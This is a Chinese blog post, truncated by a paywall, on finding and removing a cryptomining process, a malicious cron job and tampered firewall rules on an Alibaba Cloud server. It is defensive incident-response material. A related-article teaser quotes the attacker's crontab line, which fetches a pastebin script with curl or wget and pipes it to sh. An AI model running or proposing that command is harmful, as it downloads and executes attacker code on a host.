记一次阿里云服务器CPU长期100%发现被被种挖矿程序解决的过程

最新推荐文章于 2023-11-10 17:43:11 发布
VIP文章 最新推荐文章于 2023-11-10 17:43:11 发布
阅读量2.6k 收藏 6
点赞数 2
分类专栏: linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/AninZz/article/details/105602617
版权

centos 7

记一次阿里云服务器被被种挖矿程序解决的过程

1、原因

偶尔发现我的服务器CPU使用率长期处于100%,就登上服务器看了一下

2、查看进程

[root@izwz94xp1kwkcahxd1vey6z /]# top

发现有一个exin的进程cpu使用率高达99%

3、看看是个什么东西

exin的pid为3363

[root@izwz94xp1kwkcahxd1vey6z /]# cd /proc/3363
[root@izwz94xp1kwkcahxd1vey6z 3363]# ll

发现是在exe -> /usr/bin/exin目录下

4、查看防火墙信息

[root@izwz94xp1kwkcahxd1vey6z 3363]# iptables -L -n -v

发现防火墙被篡改增加了很多国外的未知ip

此时其实问题已经找到了,这个进程就是挖矿程序,先kill掉

[root@izwz94xp1kwkcahxd1vey6z 3363]# kill -9 3363

不过一般这种挖矿程序都不会这么轻易被干掉的,我们继续

5、查看ROOT定时任务

[root@izwz94xp1kwkcahxd1vey6z 3363]# crontab -l
MAILTO=''
*/19 * * * * /etc/cron.hourly/agetty >/dev/null 2>&1

果然发现了一条定时任务

可以看到是每隔19分钟执行一次脚本,脚本的内容在/etc/cron.hourly/agett

最低0.47元/天 解锁文章
AninZz
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
阿里云ECS服务器云盘扩容视频教程
05-28
针对服务器云盘占用达到100%后,服务不可用,需要进行扩容。但是很多新手或者不怎么深入了解过扩容的铁子们,这个视频手把手教你进行阿里云服务器扩容
阿里云服务器磁盘使用率告警
蜗牛^_^的博客
02-24 4177
最近经常收到阿里云告警短信:云服务器实例发生告警,磁盘使用率(98%>85%),持续时间XX天XX时XX分钟。 显然是由于磁盘使用率超过了设置所以进行告警,具体解决如下:(在root账户登录下) 1.直接使用df -h的命令,可以查看到磁盘的大小、使用量、剩余量、使用率及是否挂载。 应该是/data使用率过高导致告警。 2.使用du -sh /data,可以查看data文件夹的大小。 查看data文件夹的大小是19G,但是显示已用却是46G。 3.存在已删除空间却没有释放的进程,使
国际阿里云:Windows系统ECS实例中CPU使用率较高问题的排查及解决方案!!
最新发布
TG_kinglki的博客
11-10 676
Process Explorer是一款Microsoft Sysinternals工具,通过配置正确的Symbols,检查对应应用程序的线程调用的Call Stack,用以定位可能的问题驱动。在使用Windows Server 2012的1 vCPU 1 GiB规格的实例时,Windows Update服务会自动更新,实例的CPU使用率也会突然升高,这是正常现象。如果可能,请升级杀毒软件到最新版本,或者删除杀毒软件。在任务管理器的进程页面中,单击PID,通过排序,找到之前资源监视器查看到的异常进程。
服务器cpu飙高-挖矿木马解决方案
以码为梦
10-29 1534
起因:前几天,开发服务器的Jenkins服务一直会出现偶然性的失败,编译代码的线程经常性被kill掉,需要启动好几次才有机会成功。给开发带来诸多不便。受不了啦,于是在一个午饭时间,决定要彻底搞清楚这个问题。 解决问题 首先使用top命令,查看cpu占用。不看不知道啊,看了吓一跳!cpu占用一直在98-100%之间,但是却看不到占用大量内存的进程,此时感觉到问题应该是被挖矿木马入侵了。 于是cr...
服务器处理挖矿
天地人的博客
10-31 1464
服务器处理挖矿排查挖矿进程 排查挖矿进程 使用top查询进程: 某个进程占用cpu或内存过分,查之:如 ls -l proc/{进程号}/exe 进入目录,分析里面的文件,进入/etc下,分析如update类似的文件。 处理过程: chattr -i 文件 rm -rf 文件 如果是root用户感染的病毒: vim /etc/selinux/config 将SELINUX=disabled改为...
一次阿里云服务器CPU长期100%发现被被挖矿程序解决过程挖矿入侵应急响应)
墨痕诉清风的博客
11-18 2427
一次阿里云服务器被被挖矿程序解决过程
阿里云服务器cpu 100% 问题处理
云飞的博客
04-18 6969
阿里云服务器CPU 100%,但使用top命令查看却找不到相关进程。 执行crontab -l 查看,发现多了一条定时任务 */23 * * * * (curl -fsSL https://pastebin.com/raw/qbbSdzZd||wget -q -O- https://pastebin.com/raw/qbbSdzZd)|sh 手动执行curl -fsSL https://p...
一次阿里云挖矿处理
热门推荐
x1172031988的专栏
07-08 4万+
一次阿里云挖矿处理过程
一次解决阿里云服务器被植入挖矿病毒
hghjgkjn的博客
06-23 1627
解决阿里云服务器被植入挖矿病毒
详细部署阿里云服务器过程(图文教程)
01-09
部署云服务器,首先需要的便是购买云服务器,这里我选择的是阿里云服务器,注册实名认证这里就不详细说明了,我购买的是云服务器ECS,可以选择大学生优惠,一个月9.5元,算是很实惠的。 我选择的操作系统是Linux...
解决阿里云服务器短时间连接自动断开问题
01-09
当SSH远程命令或者远程工具登录阿里云服务器,ssh [email protected].* 时,经常会发现SSH连接后一会儿客户端就被服务器T掉。一般上,是因为SSH连接没有设置保活 解决方法有两个:1、设置SSH客户端保活,2、要不设置SSH...
GPT3.5版本AI问答手微信小程序源码 无需服务器阿里云函数搭建
05-19
搭建前说明:此教程使用阿里云函数搭建,搜阿里云函数,开通,领取 100 万次调用。 此教程只是函数使用阿里云,数据库什么的不用动,如果你之前有版本上线,直接复制那个版本的数据库账号密码填写到新搭建的阿里云...
基于单片机的智能药盒设计答辩PPT,包含嵌入式硬件、微信小程序阿里云服务器
07-02
基于单片机的智能药盒设计答辩PPT,包含嵌入式硬件、微信小程序阿里云服务器,主要介绍了产品的设计方案以及所需要的知识能力。介绍了在设计过程中的硬件迭代,描述了智能药盒所实现的功能。
重新运行一次阿里云服务器.从零开始搭建.?log-换-服务器
01-09
一次 /usr/local 在官网下载最新版 http://mirror.bit.edu.cn/apache/tomcat/tomcat-9/v9.0.31/bin/apache-tomcat-9.0.31.tar.gz [root@*** local]# pwd /usr/local [root@*** local]# wget ...
CentOS7.4安装JDK
AninZz
01-18 915
1、环境: 虚拟机:VMware Workstation 系统:CentOS7.4 x86_64 2、工具: 我这边用的是Xshell6-6.0.0111r,WinSCP 原因就是方便 3、先下载JDK,因为比较慢,得等一会儿 http://www.oracle.com/technetwork/java/javase/downloads/jdk8-downloads-2133151....
centOS7.4安装gitlab
AninZz
01-23 819
1、环境: 虚拟机:VMware Workstation 系统:CentOS7.4 x86_64 2、工具: 我这边用的是Xshell6-6.0.0111r,WinSCP 原因就是方便 3、下载安装包 下载地址:https://mirrors.tuna.tsinghua.edu.cn/gitlab-ce/yum/el7/gitlab-ce-10.0.0-ce.0.el7.x86_64...
CentOS7.4安装mongodb
AninZz
01-23 616
1、环境: 虚拟机:VMware Workstation 系统:CentOS7.4 x86_64 2、工具: 我这边用的是Xshell6-6.0.0111r,WinSCP 原因就是方便 3、下载安装包 下载地址:https://www.mongodb.com/download-center#community 我下的这个 4、将下载好的tgz上传至/usr/local 5、解压...
centOS7.4安装maven
AninZz
01-24 344
1、环境: 虚拟机:VMware Workstation 系统:CentOS7.4 x86_64 JDK1.8 2、工具: 我这边用的是Xshell6-6.0.0111r,WinSCP 原因就是方便 3、下载: [root@localhost ~]# wget http://mirrors.hust.edu.cn/apache/maven/maven-3/3.5.4/binari...
一次阿里云ECS服务器图片资源迁移至 阿里云 oss
05-27
好的,您可以先登录阿里云ECS服务器,然后安装OSS工具包,可以使用以下命令: ``` sudo apt-get update sudo apt-get install ossfs ``` 接下来,您需要在阿里云OSS中创建一个Bucket,并且获取您的Access Key ID和...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值